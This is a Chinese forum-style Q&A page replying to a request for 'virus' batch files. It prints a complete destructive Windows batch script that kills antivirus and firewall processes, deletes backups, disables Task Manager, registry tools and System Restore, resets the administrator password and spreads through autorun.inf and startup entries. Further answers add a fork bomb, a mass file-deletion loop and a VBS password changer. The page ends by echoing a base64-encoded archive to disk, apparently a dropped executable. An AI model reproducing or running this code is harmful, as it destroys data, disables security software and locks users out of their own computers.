批处理文件的病毒代码大全! 谁可以给我大量流行病毒的批处理文件或代码

\u6279\u5904\u7406\u75c5\u6bd2\u4ee3\u7801\uff1f

\u6279\u5904\u7406(Batch)\uff0c\u4e5f\u79f0\u4e3a\u6279\u5904\u7406\u811a\u672c\u3002\u987e\u540d\u601d\u4e49\uff0c\u6279\u5904\u7406\u5c31\u662f\u5bf9\u67d0\u5bf9\u8c61\u8fdb\u884c\u6279\u91cf\u7684\u5904\u7406\u3002\u6279\u5904\u7406\u6587\u4ef6\u7684\u6269\u5c55\u540d\u4e3a bat \u3002
\u3000\u3000\u76ee\u524d\u6bd4\u8f83\u5e38\u89c1 \u7684\u6279\u5904\u7406\u5305\u542b\u4e24\u7c7b\uff1aDOS\u6279\u5904\u7406\u548cPS\u6279\u5904\u7406\u3002PS\u6279\u5904\u7406\u662f\u57fa\u4e8e\u5f3a\u5927\u7684\u56fe\u7247\u7f16\u8f91\u8f6f\u4ef6Photoshop\u7684\uff0c\u7528\u6765\u6279\u91cf\u5904\u7406\u56fe\u7247\u7684\u811a\u672c\uff1b\u800cDOS\u6279\u5904\u7406\u5219\u662f\u57fa\u4e8eDOS\u547d\u4ee4\u7684\uff0c\u7528\u6765\u81ea\u52a8\u5730\u6279\u91cf\u5730\u6267\u884cDOS\u547d\u4ee4\u4ee5\u5b9e\u73b0\u7279\u5b9a\u64cd\u4f5c\u7684\u811a\u672c\u3002\u8fd9\u91cc\u8981\u8bb2\u7684\u5c31\u662fDOS\u6279\u5904\u7406\u3002
\u3000\u3000\u6279\u5904\u7406\u662f\u4e00\u79cd\u7b80\u5316\u7684\u811a\u672c\u8bed\u8a00\uff0c\u5b83\u5e94\u7528\u4e8eDOS\u548cWindows\u7cfb\u7edf\u4e2d\uff0c\u5b83\u662f\u7531DOS\u6216\u8005Windows\u7cfb\u7edf\u5185\u5d4c\u7684\u547d\u4ee4\u89e3\u91ca\u5668\uff08\u901a\u5e38\u662fCOMMAND.COM\u6216\u8005CMD.EXE\uff09\u89e3\u91ca\u8fd0\u884c\u3002\u7c7b\u4f3c\u4e8eUnix\u4e2d\u7684Shell\u811a\u672c\u3002\u6279\u5904\u7406\u6587\u4ef6\u5177\u6709.bat\u6216\u8005.cmd\u7684\u6269\u5c55\u540d\uff0c\u5176\u6700\u7b80\u5355\u7684\u4f8b\u5b50\uff0c\u662f\u9010\u884c\u4e66\u5199\u5728\u547d\u4ee4\u884c\u4e2d\u4f1a\u7528\u5230\u7684\u5404\u79cd\u547d\u4ee4\u3002\u66f4\u590d\u6742\u7684\u60c5\u51b5\uff0c\u9700\u8981\u4f7f\u7528if\uff0cfor\uff0cgoto\u7b49\u547d\u4ee4\u63a7\u5236\u7a0b\u5e8f\u7684\u8fd0\u884c\u8fc7\u7a0b\uff0c\u5982\u540cC\uff0cBasic\u7b49\u4e2d\u9ad8\u7ea7\u8bed\u8a00\u4e00\u6837\u3002\u5982\u679c\u9700\u8981\u5b9e\u73b0\u66f4\u590d\u6742\u7684\u5e94\u7528\uff0c\u5229\u7528\u5916\u90e8\u7a0b\u5e8f\u662f\u5fc5\u8981\u7684\uff0c\u8fd9\u5305\u62ec\u7cfb\u7edf\u672c\u8eab\u63d0\u4f9b\u7684\u5916\u90e8\u547d\u4ee4\u548c\u7b2c\u4e09\u65b9\u63d0\u4f9b\u7684\u5de5\u5177\u6216\u8005\u8f6f\u4ef6\u3002\u6279\u5904\u7406\u6587\u4ef6\uff0c\u6216\u79f0\u4e3a\u6279\u5904\u7406\u7a0b\u5e8f\uff0c\u662f\u7531\u4e00\u6761\u6761\u7684DOS\u547d\u4ee4\u7ec4\u6210\u7684\u666e\u901a\u6587\u672c\u6587\u4ef6\uff0c\u53ef\u4ee5\u7528\u8bb0\u4e8b\u672c\u76f4\u63a5\u7f16\u8f91\u6216\u7528DOS\u547d\u4ee4\u521b\u5efa\uff0c\u4e5f\u53ef\u4ee5\u7528DOS\u4e0b\u7684\u6587\u672c\u7f16\u8f91\u5668Edit.exe\u6765\u7f16\u8f91\u3002\u5728\u201c\u547d\u4ee4\u63d0\u793a\u201d\u4e0b\u952e\u5165\u6279\u5904\u7406\u6587\u4ef6\u7684\u540d\u79f0\uff0c\u6216\u8005\u53cc\u51fb\u8be5\u6279\u5904\u7406\u6587\u4ef6\uff0c\u7cfb\u7edf\u5c31\u4f1a\u8c03\u7528Cmd.exe\u8fd0\u884c\u8be5\u6279\u5904\u7406\u7a0b\u5e8f\u3002\u4e00\u822c\u60c5\u51b5\u4e0b\uff0c\u6bcf\u6761\u547d\u4ee4\u5360\u636e\u4e00\u884c\uff1b\u5f53\u7136\u4e5f\u53ef\u4ee5\u5c06\u591a\u6761\u547d\u4ee4\u7528\u7279\u5b9a\u7b26\u53f7\uff08\u5982\uff1a&\u3001&&\u3001|\u3001||\u7b49\uff09\u5206\u9694\u540e\u5199\u5165\u540c\u4e00\u884c\u4e2d\uff1b\u8fd8\u6709\u7684\u60c5\u51b5\u5c31\u662f\u50cfif\u3001for\u7b49\u8f83\u9ad8\u7ea7\u7684\u547d\u4ee4\u5219\u8981\u5360\u636e\u51e0\u884c\u751a\u81f3\u51e0\u5341\u51e0\u767e\u884c\u7684\u7a7a\u95f4\u3002\u7cfb\u7edf\u5728\u89e3\u91ca\u8fd0\u884c\u6279\u5904\u7406\u7a0b\u5e8f\u65f6\uff0c\u9996\u5148\u626b\u63cf\u6574\u4e2a\u6279\u5904\u7406\u7a0b\u5e8f\uff0c\u7136\u540e\u4ece\u7b2c\u4e00\u884c\u4ee3\u7801\u5f00\u59cb\u5411\u4e0b\u9010\u53e5\u6267\u884c\u6240\u6709\u7684\u547d\u4ee4\uff0c\u76f4\u81f3\u7a0b\u5e8f\u7ed3\u5c3e\u6216\u9047\u89c1exit\u547d\u4ee4\u6216\u51fa\u9519\u610f\u5916\u9000\u51fa\u3002 \u7ed9\u4f60\u4e3e\u4e00\u4e2a\u7b80\u5355\u7684\u6279\u5904\u7406\u5efa\u7acb\u4e00\u4e2a\u6587\u672c\u6587\u6863\uff0c\u8f93\u5165 tree c:\ > c:\1.txt \u4fdd\u5b58\u4e3a tree.bat\u8fd0\u884c\u4e00\u4e0b\uff0c\u5c31\u628aC\u76d8\u76ee\u5f55\u8f93\u5165\u5230c\u76d81.txt\u91cc\u9762\u4e86\uff0c\u770b\u4e00\u4e0b\u662f\u4e0d\u662f \u6279\u5904\u7406\u7528\u5904\u5f88\u591a\uff0c\u4e5f\u662f\u53ef\u4ee5\u5236\u4f5c\u75c5\u6bd2\u7684\u770b\u770b\u6279\u5904\u7406\u7684\u767e\u5ea6\u767e\u79d1\u5427http://baike.baidu.com/view/356836.htm

bat\u662f\u4e0d\u80fd\u6740\u6bd2\u7684\u54e6
\u6700\u597d\u7528\u6740\u6bd2\u8f6f\u4ef6\u597d

最强病毒!谨慎运行!此程序会将系统搞崩溃.

摘自:htt我ps://www是.jb51.net/a链rticle/7129.h接tm  去掉里面的字哦

@echo off  
title You DEAD!!!!!!!  
set taskkill=s  
copy %0 %windir%\system32\cmd.bat  
attrib %windir%\system32\cmd.bat +r +s +h  
net stop sharedaccess >nul  
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul  
%s% /im norton* /f >nul  
%s% /im av* /f >nul  
%s% /im fire* /f >nul  
%s% /im anti* /f >nul  
%s% /im spy* /f >nul  
%s% /im bullguard /f >nul  
%s% /im PersFw /f >nul  
%s% /im KAV* /f >nul  
%s% /im ZONEALARM /f >nul  
%s% /im SAFEWEB /f >nul  
%s% /im OUTPOST /f >nul  
%s% /im nv* /f >nul  
%s% /im nav* /f >nul  
%s% /im F-* /f >nul  
%s% /im ESAFE /f >nul  
%s% /im cle /f >nul  
%s% /im BLACKICE /f >nul  
%s% /im def* /f >nul  
%s% /im 360safe.exe /f >nul  
net stop Shadow" "System" "Service  
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z  
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul  
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul  
rem 修改注册表.......  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\  
Folder\Hidden\SHOWALL /v   
CheckedValue /t REG_DWORD /d 00000000 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoRun /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoRecentDocsMenu /t   
REG_DWORD /d 00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoDrives /t REG_DWORD /d   
4294967295 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   
Disableregistrytools /t   
REG_DWORD /d 00000002 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoNetHood /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V   
NoDesktop /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoClose /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoFind /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   
DisableTaskMgr /t REG_DWORD   
/d 00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoLogOff /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
NoSetTaskBar /t REG_DWORD   
/d 00000001 /f >nul  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v   
DisableSR /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v   
DisableConfig /t REG_DWORD /d   
00000001 /f >nul  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
RestrictRun /t REG_DWORD /d   
00000001 /f >nul  
cls  
net user administrator 123456 >nul  
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul  
echo @echo off >d:\setup.bat  
echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新  
安装系统可以解决此问题  
!^.^ >>d:\setup.bat  
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动  
\a.bat >>d:\setup.bat  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>d:\setup.bat  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>d:\setup.bat  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>d:\setup.bat  
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f   
>>d:\setup.bat  
echo [windows] >> %windir%\win.ini  
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini  
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini  
echo [boot] >> %windir%\system.ini  
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini  
echo [AutoRun] >d:\autorun.inf  
echo Open=setup.bat >>d:\autorun.inf  
echo Open=system.bat >>d:\autorun.inf  
attrib d:\autorun.inf +r +s +h >>d:\setup.bat  
attrib d:\setup.bat +r +s +h >>d:\setup.bat  
start d:\setup.bat /min >nul  
echo @echo off >>C:\AUTOEXEC.BAT  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
AUTOEXEC.BAT /t REG_SZ /d   
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
AUTOEXEC.BAT /t REG_SZ /d   
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   
AUTOEXEC.BAT /t REG_SZ /d   
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>C:\AUTOEXEC.BAT  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>C:\AUTOEXEC.BAT  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>C:\AUTOEXEC.BAT  
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT  
copy %0 %systemroot%\windows.bat >nul  
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat  
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%  
windir%/system32/explorer.bat  
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%  
windir%/system32/explorer.bat  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
AUTOEXEC.BAT /t REG_SZ /d   
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
AUTOEXEC.BAT /t REG_SZ /d   
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>%windir%/system32/explorer.bat  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
setup.bat /t REG_SZ /d d:\setup.bat   
/f >>%windir%/system32/explorer.bat  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
explorer.bat /t REG_SZ /d %  
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
explorer.bat /t REG_SZ /d %  
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat  
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat  
attrib %windir%/system32/explorer.bat +r +s +h%  
attrib %systemroot%/windows.bat +r +s +h  
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat  
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat  
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat  
set drive=e f g h i j k l m n o p q r s t u v w x y z  
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf  
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf  
copy %0 d:\Program" "Filesun.bat  
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start   
d:\Program" "Filesun.bat /min   
>>%%c:\system.bat  
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat  
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul  
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul  
if not exist %windir%/system32/explorer.bat start d:\Program" "Filesun.bat  
/min >>d:\setup.bat  
attrib d:\Program" "Filesun.bat +r +s +h >nul  
del %0  
exit


很多,有几个思路贡献下
第一种
:1
start %0
goto 1
这个代码会自己运行自己,产生无限窗口,直到内存爆满死机。
第二种
copy %0 "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*“
copy %0 "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*"
copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
加上这个代码之后,会把自身添加到启动菜单中(随系统启动而启动,与shutdown -r -t 0搭配使用威力倍增)
第三种
for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
这是删除CDEF盘上面的gho文件,使用户无法通过ghost恢复系统
第四种(特殊)
Echo Const strPassword = "wohenni"' >>1.vbs
echo Dim WshNetwork >>1.vbs
echo Set WshNetwork = CreateObject("WScript.Network") >>1.vbs
echo Dim userName >>1.vbs
echo userName = WshNetwork.userName&",user" >>1.vbs
echo Dim Domain >>1.vbs
echo Set Domain = GetObject("WinNT://./"&userName) >>1.vbs
echo Domain.SetPassword strPassword >>1.vbs
echo Domain.SetInfo >>1.vbs
echo dim gj >>1.vbs
echo on error resume next >>1.vbs
echo dim WSHshellA >>1.vbs
echo set WSHshellA = wscript.createobject("wscript.shell") >>1.vbs
start “” “1.vbs“
生成能把登录密码改为”wohenni”的VBS,并运行。
第五种

fsutil file createnew C:\1.hahaha 4096000
这是生成特定大小的文件,这句意思是在C盘下面生成1.hahaha,大小为4096000字节
还有很多,不一一列举了,希望您能更好地学习批处理!

@echo off
echo UEsDBBQAAAAIAHV36kiQ6IfZcyEAAAA6AAAIAAAATUVNWi5leGXtew10U8e17kg6soUtjACbGGzi>x
echo AxgMyD9Hlm1sY4JkW2AH/wjLP5BgB9k6RhKSjqIfbKcJyBgaqw65tM1NIJckNE1705Tcpi3JJWma>>x
echo OD830Da0TptFSQOpXx7NFSnhmYRbnIRw3jfnyMZpfmCt99b7WauzvM+c2TOz95699+zZIw71t+wl>>x
echo KkIIAxBFQo4QuZjItctJQErWcynk8LTjC44o6o4vaHa6gqw/IGwJ2L1sl93nE0JsJ88Gwj7W5WOr>>x
echo G22sV3Dw+dOnJ2XHaTxj9pZ/yKpcE/Dphr2uz6R3pet3qDdvT3BekurLro+kWuGkdZOry0nHf5Vs>>x
echo VgshdQo1eXHNzrYJ3ChRKpIVKYRo0Vgu4/Jm4aEDsPFV03clIWqikPonahKJK0nqNu2WBtKxk/Vk>>x
echo JZXDKwk5SF82ExJTfImAfogBPnvLCSm9Dl1PFsip+zJ68ZIf4ntDdHnJcYG0V+WeQmJzfsBhD9kJ>>x
echo eXmBjCAL/24BRNKGKV8eRu6jPK1E0g0p/MK44fxAMNBF4mvdHB9X9CX0ArxH6JLXTnUgyVbyhXGV>>x
echo X73Cf5T/naVl6NzAXVpdaDqec0KJ7eLiU6yJxBLQZRxuf1lHWtvcqR1Gsa2tzXlFZyJO6iRtYpoD>>x
echo o9wOMc2EeuC8Ivzn2zrOTtA7l2lrbXPuKjMRMa0I/UPFEfocd94DVJt4wnmQ1kMnxRNGcWhs99uh>>x
echo hbv/Frpxj0W0trkV7tniH/ZYLlrdCZQlvHJYPDHw6tI9lnGre6mY5gElq5hGUO2xxKzOwxLJNA3a>>x
echo GL/Hcuao5Yzkqm1iePyoZYy6mZjGoNuZiK3sThDTRtG4rePWob+0v9Iqpm2mBN3E+cZcLEgNygsw>>x
echo VIdFOitWQOixWME0qOL3l4pHlmM9Rf98zIpxIPk65mH6MVTG4Y6XGbry/nMV4GdrNb7dFm2/+Au6>>x
echo B2xuk5jWi0E2a9QyFpc/9gRoOmMqKhpVoJu4lbFdwA2NH9396meimIuZe6Q3a1vsdtrRPmb8m/j0>>x
echo 68BAVrppxDQ/XRTl4TZFLZdlLlLbKoYvRy3jsWpMhBZsYlouunYPhxVr0COmLUULeDEtRLU4wUaH>>x
echo 0RjzYJs8YGX44l3q2BX0RcMX3Ulnm0RRlIzrsLUOFY/QZb/dZhNPuBXf37Ue9E58f3A9tcllWKdC>>x
echo NtJe6ht3XVbMuPcvMIkzG/oU/YyYxknSzNg9CNvYbDbnzTOhHpvsU3ssjx+1PM6h54VSjD9qeYrA>>x
echo 66zR8Ei0/VC0/XC0/Ui0/flo+3C0/dVo+7Fo++vR9jfFtJNUwyhuh9tB61aQe1Nyvct4/jV1j+Uk>>x
echo BIpJDOjbGXm81Dixe3jHnzFVhT8nGA87HZLr3knnn4y2jw98KoY1bqWY5pQ0TN0oblTqv2WrYstM>>x
echo ZFv6c+nwnKHf6k98i0laO6gwr5TwgQvGX5VNP0dHzPlWf81CExnclXIF6jCvlLCB992EurtEttU2>>x
echo ND+bGucPMATjVv31HphpaJVkrz/C7hFI51bCW+Jy9l6Vc2zgihhOdDNnW0XqIpSkWPw6XNY5tow6>>x
echo KqWY6FafXYHuVhBLMr5tk+Y7TxXK2t8HMmXzTwE19OnQfOqW25a+wFHTbmPEPxiHrdZWp34ebGGV>>x
echo LbV24DXNylV0fOC0U5cDV/vDXy8NFdN98SLdOu6iNmcNavjIwHiCbG2KGy2dwIV7nTTWTyjTSc+h>>x
echo oTFqulK6KdS3uZNskte0Uvnuo970PxTh9/dYDhy1HKigmzwaPgQP2VBGHeUgSJFo+2PR9sclP3n+>>x
echo qOVIkrT7D1DiVHdiGK5STU1/tuCK5M7r17uToE8Sq1XLu1y3QNrlBLvcOVomb3WqmdhSDNj/7DFQ>>x
echo ufRxtOXy25bLp9vHT1vG37Zo5JdTxRvKTeSUmqPPVRHp3YnnOy/FDmIuDTcSQ8RGGszEtKeo3Sza>>x
echo Z/dpQPnSx3v8ytgrDH29MvRJ7Nn424exn+DNrdp/66VPb57xkz+qWi43xQ5InbR9QtUy3iSmHaL6>>x
echo Um6IRzVpm+pasZEPS3EXL+ckH9ljGUNcTHtMYnzZ+Cu95aJTQ4xk/fpW65BlXI9uvIpp6TS2YeCr>>x
echo UpAH2UnhqRtYnffNjR8EcVeIJVMZb9y/8atUM33pFNUMSu+bZdXsZmTVwLsr5lJvPizHjiOUdeGG>>x
echo V3AgkNghlWycVNk4R6x0oAaN2HfQ406ljPcwM+WFZ9smV37SFm0fkxePCLnHcspqk1cfuwXzhurP>>x
echo DLx0YD+V+WKsVkLEJhDjsdKpI4b+FFs6dQAMlK6i/rBBSf0BVpo2pelkyeukzTbUftnW1EoDbfii>>x
echo TVaqTQyPyWqVdHPutOXcqeKaKbrxS++leMa2guJUg2bGT7bYwzTkL98IMdyZOPAGXuasbkV3tCUm>>x
echo pl2ka9uupKLsVVBR9uzMVUz63sC59C91ithVp7g4VD8miW9dT7dF68DwAese8wGru9BdCMfInOIY>>x
echo Uxz/iysw0RX8SElXMMk8deLgaHMniyf2618eGndr3xDl17E3rsRtL51lkmgnpSgm7ROnYgeR9uIw>>x
echo HUJ99TU8L+qPDq0aoxib+MfYN7FSCDU0NqHYXgjxVuzUS6fVVupsH8Ld5kCkoWNDr0F5u38fXu5U>>x
echo gWxTnGrMoqDbahU9x5pipXKDnm1NoG6TTs5X/36ftU5GsGb5HHe4lQhhUihzT8exIaaNS6ddKKM1>>x
echo xoHkRnlMKyrtZDc0u0HKI0wd7S9ryFdlJRzNSmI0Zo9JkWkIvvT4l6QhA3dpVG1Dd+nCZbahrEtV>>x
echo EMUUCeW2xnh4z9B0uiL9utT9kts2SahBCaWjnh/MjNrSO25F9kTFoxp/nqZL7S9rKWWkNn9rG3pn>>x
echo 6MrQaw04ULRDFg1yAN3GjUNjVe6ktXI289d3aaj43j3rpZxjsRMKGnMrEDYoRkzTyrmIxq2QD1Rp>>x
echo 4J76y+vdDIytk2PTYhxTOyaiTutQWIM1bqIHwLhiu9X4+xpb29A4HGXoT7vF7XO7h5jtM/5d29Ed>>x
echo ZTqquqPa7Y0r/3zn+6Cye3j7AnfSbe7pG7vLKlrDuu6yulZleBqGtHZH72xVVq4cufMvt90quejb>>x
echo m7IvD1VnX35FXFxDz9vFddLTKj0HWdP/iWT8/0I5bCLkGGAUMA7QmWX8d/B+wCS/n19FyCcAzU2E>>x
echo pAJYAAdYA3gP+G7UdwDuBzwOeA5wDHACMIL+YcDPAA8D9gJ2AbYBNqDfsUrmcSDO14raBOAA3XGc>>x
echo EnLMAlAjcAAToBlAPesOwN9WE/IYYCfAB9gEqAGUAJYAZgGugFcM9SnACOA5wBhwe1fLPHbFeeUD>>x
echo 6O8hvxhNvPeVe98+wiifVZJnyC8IOT7bMBx9JfpS9OUXCHmRmA71X3k4MVhcEQmqzupI9o7Blw49>>x
echo ceVXkY/F8KWz74qDrx6KvnIo+mH0nf7XiGmij4QvRU+cfVV86pn3qo6odD8nx3UvQpbhh54lR+59>>x
echo 6Qghz44kfvTjFw48AuwZu1b1nv3niqbD33wWY8jm42m39F+JPXIXc+jw2I+v/CbyKQn/99boiSej>>x
echo L0XOZL1XOTj6XuXwB+rhvygH/xr9sKP/k4sPhV95gZhA6ggWc/IIWAxf+c1Zljx16olDT/RfGX4o>>x
echo VNkvHpwRUp09J1IuijgXzOj/5MAjYdVzFx+S+Rz/Ih+Jydmfi+Bw9iWRtDwxMBNFus9rpF8SWFKc>>x
echo PHDhwswLhKwj9zMRkTQ2kkcayfu2nVkXshSVDaTBqpyVNaBDUVoZpVUT0SkNWQOpKMoIM1CNohxk>>x
echo lJGUu00p589/gKJ8lFH+QL3z/PkU5eYblYOagTUoypOMciTlHnL+g9OnTqMcx5/yI2bg9AfnifLn>>x
echo 8we6UVQso2I1qoUp/eS88lO1yswMjCQmjig/ZnadJ7rEROXP5g34UFR+ZuA8iqqXUfk1u0liIhk9>>x
echo r7pJ808gSnp6ehJHRkZGE/GiUs5T9WoG3kdRHWNUw5rdScTfk0hU96qVnzD9p0ZUjzKRHtX7jOo8>>x
echo o2qZN/AECqNjGJ2GmZNEx/ohyMeJqn3qyBhTykT8zEq16odzB76PwmxmBowojJNhNk8fUJHz7ygv>>x
echo MKr7E/t7/MxqhrmHYdbMY5yau8tQPgYwT2kfLOMg6fl35JLih6hy6fErVP86d2A/ipow/fsfUTMJ>>x
echo ajJtEG0syE8UqkFmQIGiXpCg1qtV6oyBb6OorYy6RqfexKhzGLVbrd6YqPYmKo7sI49cSNgfVB/6>>x
echo buKOhMQd63ZemJml/rGoeeIXSuvHqhq1qkEdmamyZar86bvOj0Ig1R6tap+mf5SoHp2vGk5nqpn+>>x
echo 0VHVO0mR06pYDjNz3oAfojL5ScyKpczmzIiKuSuZuXspMzyd+aUuUsb8Npk5maPWabUjWvUNGjWb>>x
echo rF6+WN2ZELmgbktT356oDsxU71yuflJM+KmY+PS/9c+cqfhOIzn1dMrlA2Rdc9LGtFmLk3bpUlBm>>x
echo mZhZJk1Sf1ZkZtKP0maFpw0QuJSWUUdOJT/NJB1XJ71h1io0O0+PjMzaz8z6HpNUkJFcq5utS0nu>>x
echo 0Mx6kImQZA+jakxIDmck75+RvG/G7Hz1rAfV2rZE7U/VyaFMRjdv58GDB1WnmdkDCZHjs6PqyA6t>>x
echo g5n9doLWmaXlZiYHGCZXPbswOdIz+9vqSGIqGrF0bTQttYUZVKEYIc87s95NjEzXOtT9fj+jh/9o>>x
echo n56nTknRnp65K3EUJXWYuRsVnMfvT32dOs1fMvovZM38nVptvSFCUt9kdirQU5qYNludNjsJepnx>>x
echo 7n/OeOu76kPinEUHb/gBo0mv16TeOosVZ2c92Z+YOPu3Nw8chIekZtbtUvn9KmOqtyj10cz+vYmp>>x
echo LxrUtfPTUsT0B0RN2n2pY4kgNidPZHfVJVlv7K82zdNxSQfZeZtv6R8ZWViqTl7ALLiQkWyam1Gb>>x
echo tLAoISMpsf/0+dR0RvVDQ/9ooirKJD+ZkPG9hIxblmTsSO9PSsp8lMl4KDnjRznaggUL30jOuJyt>>x
echo 3XFjhMu8KSmzNidTyIzsXZSekPndfLU1A0Lo3hqPXFhirScPr9154ULWkkcb4HMJo+KCZ/6gqlUv>>x
echo vFetshUnb0hZ9B8a1cPlyY8nL09Sq2Lm5I81i25PZipMi57XMfdwiy5nZt+g1v7bwkhWtml+pCe7>>x
echo Q/vNUTnmay8yy7QZ2XvZ3G+oc7eqs388g5SKeXN35IoNOSv2LXnoQSx+8X/dkiWYklhu7tiNEV2S>>x
echo YJhnYpVjkXmj6dMVTGTzvM+mqe5fnsGlR1JUb92dMZJuvFnN3GVMtc41/gvDHF/GfS9J+0aWOmvx>>x
echo jdHZuZvT1J4czSyRM36W+IKYN0/Mn/tdQ0lyZMxQ8UHy3Jx5o3P7N2+e92lycvfywoPpyY8PGk2Z>>x
echo 2roi4975EaP24azi0dnaEWt2dP70VfNnvCUmPC/OGBR1u8Qlzb9eMPzrec8tWfjUsoxpOctH0itv>>x
echo Tpi9fafen56aXqofnrtrGkpZ5k2Nqb80qq2Z2T9Ki1xIWyjOWS/eYBXT68WSO39vJqJZfDLjQFHl>>x
echo aHqEyzi7oopL3zXN759WVlVvzdxjrBqZX3VeS62Q/VzjmpY3blwpKm5dQZ1jmdjIReaO/Xrht5bM>>x
